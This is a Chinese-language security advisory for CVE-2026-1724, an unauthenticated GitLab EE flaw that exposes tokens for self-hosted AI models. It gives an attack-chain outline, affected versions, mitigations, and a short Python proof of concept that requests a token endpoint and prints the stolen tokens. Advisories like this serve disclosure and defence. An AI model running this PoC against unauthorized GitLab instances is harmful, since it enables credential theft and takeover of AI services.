IPBUF安全漏洞报告
English
CVE-2026-1724 CVSS 6.8 中危

CVE-2026-1724 GitLab EE 未授权访问AI模型Token漏洞

披露日期: 2026-03-25

漏洞信息

漏洞编号
CVE-2026-1724
漏洞类型
访问控制缺陷
CVSS评分
6.8 中危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
GitLab Enterprise Edition (EE)

相关标签

Access ControlInformation DisclosureGitLabCVE-2026-1724AI SecurityUnauthorized Access

漏洞概述

GitLab企业版(EE)在特定版本中存在严重的访问控制缺陷。由于对自托管AI模型的API令牌访问权限管理不当,未经身份认证的远程攻击者可利用此漏洞,无需用户交互即可直接获取敏感的API令牌。受影响的版本范围较广,涵盖18.5至18.10.1之前的多个发行版,该漏洞可能导致AI服务被未授权调用或引发进一步的数据泄露风险。

技术细节

该漏洞的核心成因在于GitLab EE针对自托管AI模型功能的访问控制机制存在设计缺陷。在受影响的版本中,部分管理AI模型API密钥的接口未正确实施身份验证中间件,导致本应仅限管理员访问的敏感端点对匿名用户开放。攻击者可以通过网络(AV:N)向GitLab实例发送特制的HTTP GET请求,目标指向与AI模型集成相关的API路径。由于无需用户交互(UI:N)且无需前置权限(PR:N),攻击者成功利用该漏洞后,可直接获得纯文本形式的API Token。这些Token通常用于连接外部自托管大模型服务,泄露后意味着攻击者完全接管了该AI通道的权限。这不仅造成机密性(C:H)受损,使得内部数据可能通过AI接口外泄,还可能利用Token消耗服务资源,对业务连续性构成潜在威胁。

攻击链分析

STEP 1
reconnaissance
攻击者识别并锁定互联网上运行的GitLab EE实例,特别是版本在18.5至18.10.1之间的目标。
STEP 2
exploitation
攻击者向GitLab实例中管理自托管AI模型的API端点发送未经身份验证的HTTP请求,尝试绕过访问控制检查。
STEP 3
exfiltration
若漏洞存在,服务器返回配置的自托管AI模型的API Token。攻击者捕获并保存这些敏感凭据。
STEP 4
post-exploitation
攻击者利用获取的API Token直接连接受害者的自托管AI服务,窃取数据或进行未授权操作。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URI configuration target_host = "http://your-gitlab-instance.com" vulnerable_endpoint = "/api/v4/ai/self_hosted_models/tokens" # Construct full URL url = f"{target_host}{vulnerable_endpoint}" try: # Send unauthenticated GET request response = requests.get(url, timeout=10) # Check if access control bypass is successful if response.status_code == 200: print("[+] Vulnerability confirmed! API Tokens retrieved:") print(response.text) else: print(f"[-] Request failed. Status Code: {response.status_code}") print(f"[-] Response: {response.text}") except requests.exceptions.RequestException as e: print(f"[-] Connection error: {e}")

影响范围

GitLab EE >= 18.5, < 18.8.7
GitLab EE >= 18.9, < 18.9.3
GitLab EE >= 18.10, < 18.10.1

防御指南

临时缓解措施
如果无法立即升级,建议暂时禁用GitLab中的自托管AI模型集成功能,或在网络边界(如WAF或防火墙)上阻断对相关API端点的访问请求,以防止未经授权的Token检索。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表